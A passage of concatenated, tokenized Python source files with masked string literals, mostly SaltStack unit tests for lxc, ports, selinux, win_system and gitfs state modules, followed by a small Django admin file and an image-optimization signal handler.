absent ( name ) , ret ) <EOL> def test_running ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_t = MagicMock ( side_effect = [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:start>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t , <EOL> '<STR_LIT>' : mock } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , '<STR_LIT>' : <EOL> { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:start>' } } } ) <EOL> self . assertDictEqual ( lxc . running ( name ) , ret ) <EOL> def test_frozen ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_t = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> comt = ( '<STR_LIT>' . 
format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . frozen ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . frozen ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , '<STR_LIT>' : <EOL> { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } } ) <EOL> self . assertDictEqual ( lxc . frozen ( name ) , ret ) <EOL> def test_stopped ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_t = MagicMock ( side_effect = [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . 
update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , '<STR_LIT>' : <EOL> { '<STR_LIT:state>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } } ) <EOL> self . assertDictEqual ( lxc . stopped ( name ) , ret ) <EOL> def test_created ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . created ( name , clone_from = True ) , ret ) <EOL> def test_started ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = None ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . started ( name ) , ret ) <EOL> def test_cloned ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . 
cloned ( name , True ) , ret ) <EOL> def test_set_pass ( self ) : <EOL> '''<STR_LIT>''' <EOL> comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : comment , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : { } } <EOL> self . assertDictEqual ( lxc . set_pass ( '<STR_LIT>' ) , ret ) <EOL> def test_edited_conf ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> comment = ( '<STR_LIT>' . format ( name ) ) <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : comment , <EOL> '<STR_LIT>' : { } } <EOL> with patch . object ( salt . utils , '<STR_LIT>' , MagicMock ( ) ) : <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> self . assertDictEqual ( lxc . edited_conf ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> mock = MagicMock ( return_value = { } ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( lxc . edited_conf ( name ) , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( LxcTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salt . exceptions import SaltInvocationError <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import ports <EOL> import os <EOL> ports . __salt__ = { } <EOL> ports . __opts__ = { } <EOL> class MockModule ( object ) : <EOL> """<STR_LIT>""" <EOL> __module__ = '<STR_LIT:A>' <EOL> class MockContext ( object ) : <EOL> """<STR_LIT>""" <EOL> __context__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class MockSys ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . modules = { '<STR_LIT:A>' : MockContext ( ) } <EOL> ports . sys = MockSys ( ) <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class PortsTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_installed ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> options = [ { '<STR_LIT>' : '<STR_LIT>' } ] <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( side_effect = SaltInvocationError ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> mock = MagicMock ( return_value = { } ) <EOL> mock_lst = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : name } } ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_lst } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( ports . 
installed ( name ) , ret ) <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name , options ) , ret ) <EOL> mock_dict = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock_dict } ) : <EOL> with patch . dict ( ports . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_dict = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock_f = MagicMock ( return_value = False ) <EOL> mock_t = MagicMock ( return_value = True ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_dict , <EOL> '<STR_LIT>' : mock_f , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> with patch . dict ( ports . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name , options ) , ret ) <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> with patch . dict ( ports . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name , [ { '<STR_LIT>' : '<STR_LIT>' } ] ) , <EOL> ret ) <EOL> with patch . object ( os . path , '<STR_LIT>' , mock_t ) : <EOL> with patch . object ( os . 
path , '<STR_LIT>' , mock_t ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( ports . installed ( name ) , ret ) <EOL> with patch . dict ( ports . __salt__ , { '<STR_LIT>' : mock_t , <EOL> '<STR_LIT>' : mock_t , <EOL> '<STR_LIT>' : MockModule ( ) } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : True } ) <EOL> self . assertDictEqual ( ports . installed ( name , <EOL> [ { '<STR_LIT>' : '<STR_LIT>' } ] ) , <EOL> ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( PortsTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch <EOL> ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import selinux <EOL> selinux . __opts__ = { } <EOL> selinux . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class SelinuxTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_mode ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> mock_en = MagicMock ( return_value = '<STR_LIT>' ) <EOL> mock_pr = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_en , <EOL> '<STR_LIT>' : mock_pr } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , <EOL> '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , <EOL> '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . 
update ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : comt , <EOL> '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( selinux . mode ( '<STR_LIT>' ) , ret ) <EOL> def test_boolean ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> value = True <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_en = MagicMock ( return_value = [ ] ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_en } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> mock_bools = MagicMock ( return_value = { name : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_bools } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , None ) , ret ) <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value , True ) , ret ) <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> mock_bools = MagicMock ( return_value = { name : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> mock = MagicMock ( side_effect = [ True , False ] ) <EOL> with patch . dict ( selinux . __salt__ , <EOL> { '<STR_LIT>' : mock_bools , <EOL> '<STR_LIT>' : mock } ) : <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( selinux . 
boolean ( name , value ) , ret ) <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( SelinuxTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import win_system <EOL> win_system . __salt__ = { } <EOL> win_system . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class WinSystemTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_computer_desc ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_desc ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> ret . update ( { '<STR_LIT:result>' : None , '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_desc ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT:result>' : False , '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . 
computer_desc ( '<STR_LIT>' ) , ret ) <EOL> def test_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> mock = MagicMock ( side_effect = [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> ret . update ( { '<STR_LIT:result>' : None , '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , <EOL> ret ) <EOL> def test_hostname ( self ) : <EOL> ret = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . 
update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( WinSystemTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import MagicMock , patch , NO_MOCK , NO_MOCK_REASON <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import salt . utils . gitfs <EOL> from salt . exceptions import FileserverConfigError <EOL> OPTS = { '<STR_LIT>' : '<STR_LIT>' } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class TestGitFSProvider ( TestCase ) : <EOL> def test_provider_case_insensitive ( self ) : <EOL> '''<STR_LIT>''' <EOL> provider = '<STR_LIT>' <EOL> for role_name , role_class in ( <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitFS ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitPillar ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . WinRepo ) ) : <EOL> key = '<STR_LIT>' . format ( role_name ) <EOL> with patch . object ( role_class , '<STR_LIT>' , <EOL> MagicMock ( return_value = True ) ) : <EOL> with patch . object ( role_class , '<STR_LIT>' , <EOL> MagicMock ( return_value = False ) ) : <EOL> with patch . object ( role_class , '<STR_LIT>' , <EOL> MagicMock ( return_value = False ) ) : <EOL> args = [ OPTS ] <EOL> if role_name == '<STR_LIT>' : <EOL> args . append ( '<STR_LIT>' ) <EOL> with patch . dict ( OPTS , { key : provider } ) : <EOL> role_class ( * args ) <EOL> role_class ( * args ) <EOL> def test_valid_provider ( self ) : <EOL> '''<STR_LIT>''' <EOL> def _get_mock ( verify , provider ) : <EOL> '''<STR_LIT>''' <EOL> return MagicMock ( return_value = verify . endswith ( provider ) ) <EOL> for role_name , role_class in ( <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitFS ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitPillar ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . WinRepo ) ) : <EOL> key = '<STR_LIT>' . format ( role_name ) <EOL> for provider in salt . utils . gitfs . VALID_PROVIDERS : <EOL> verify = '<STR_LIT>' <EOL> mock1 = _get_mock ( verify , provider ) <EOL> with patch . 
object ( role_class , verify , mock1 ) : <EOL> verify = '<STR_LIT>' <EOL> mock2 = _get_mock ( verify , provider ) <EOL> with patch . object ( role_class , verify , mock2 ) : <EOL> verify = '<STR_LIT>' <EOL> mock3 = _get_mock ( verify , provider ) <EOL> with patch . object ( role_class , verify , mock3 ) : <EOL> args = [ OPTS ] <EOL> if role_name == '<STR_LIT>' : <EOL> args . append ( '<STR_LIT>' ) <EOL> with patch . dict ( OPTS , { key : provider } ) : <EOL> if role_name == '<STR_LIT>' or ( role_name != '<STR_LIT>' <EOL> and provider != '<STR_LIT>' ) : <EOL> role_class ( * args ) <EOL> else : <EOL> self . assertRaises ( <EOL> FileserverConfigError , <EOL> role_class , <EOL> * args <EOL> ) <EOL> with patch . dict ( OPTS , { key : '<STR_LIT:foo>' } ) : <EOL> self . assertRaises ( <EOL> FileserverConfigError , <EOL> role_class , <EOL> * args <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( TestGitFSProvider , needs_daemon = False ) </s>
<s> from django . contrib import admin <EOL> from cms_redirects . models import CMSRedirect <EOL> class CMSRedirectAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> search_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> radio_fields = { '<STR_LIT>' : admin . VERTICAL } <EOL> fieldsets = [ <EOL> ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> } ) , <EOL> ] <EOL> admin . site . register ( CMSRedirect , CMSRedirectAdmin ) </s>
<s> from django . dispatch import receiver <EOL> from image_diet . diet import squeeze <EOL> try : <EOL> from easy_thumbnails . signals import saved_file , thumbnail_created <EOL> @ receiver ( saved_file ) <EOL> def optimize_file ( sender , fieldfile , ** kwargs ) : <EOL> squeeze ( fieldfile . path ) <EOL> @ receiver ( thumbnail_created ) <EOL> def optimize_thumbnail ( sender , ** kwargs ) : <EOL> squeeze ( sender . path ) <EOL> except ImportError : <EOL> pass </s>
